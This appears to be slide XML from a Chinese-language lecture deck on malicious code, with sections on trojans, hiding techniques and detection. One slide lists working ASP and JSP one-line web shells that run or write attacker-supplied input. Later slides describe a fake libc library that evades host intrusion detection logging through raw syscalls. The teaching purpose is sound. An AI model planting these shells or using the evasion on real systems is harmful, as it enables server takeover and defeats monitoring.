          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64555" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1030287" y="2762251"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9369E7"/>
          </a:soli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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64557" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1108075" y="2794000"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64569" name="Rectangle 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1023937" y="3856038"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="669900"/>
          </a:soli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64570" name="Text Box 58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1839913" y="2686050"/>
            <a:ext cx="5497512" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>木马的工作原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64571" name="Text Box 59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1101725" y="3887788"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64587" name="Line 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="4441825"/>
            <a:ext cx="6167437" cy="7938"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64583" name="Rectangle 71"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1028700" y="5100638"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9369E7"/>
          </a:soli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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64584" name="Text Box 72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1831976" y="3787775"/>
            <a:ext cx="5645150" cy="579438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>隐藏技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64585" name="Text Box 73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1082675" y="5141913"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64588" name="Line 76"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="5686425"/>
            <a:ext cx="6167437" cy="7938"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64550" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1030287" y="1670051"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="669900"/>
          </a:soli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64551" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1836738" y="1633538"/>
            <a:ext cx="5726112" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>恶意代码概述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64552" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1108075" y="1701800"/>
            <a:ext cx="354013" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64589" name="Line 77"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1303338" y="2262188"/>
            <a:ext cx="6167437" cy="7937"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64600" name="Text Box 88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1827214" y="5018088"/>
            <a:ext cx="5611812" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>恶意代码检测与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>防御</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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机木马木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27654" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567174" y="1281548"/>
            <a:ext cx="8576826" cy="5150783"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一句话木马示例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> request("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>")%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;%execute request("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>")%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;%'&lt;% loop &lt;%:%&gt;&lt;%execute request("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>")%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ExecuteGlobal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> request("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>")%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一句话木马示例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;%</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>("f")!=null)(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>java.io.FileOutputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>application.getRealPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>("\\")+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>("f"))).write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>("t").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>getBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>());</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>%&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381353451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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1509194"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>subhook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>前缀的函数摘抄自开源代码（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/Zeex/subhook/blob/master/subhook_x86.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 2. rmgr__fake_libc.so</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256115236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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1509194"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>fake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>前缀的函数主要用于对抗常见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的进程和命令记录，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>fork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调用，而不使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的封装，避开了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方式的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
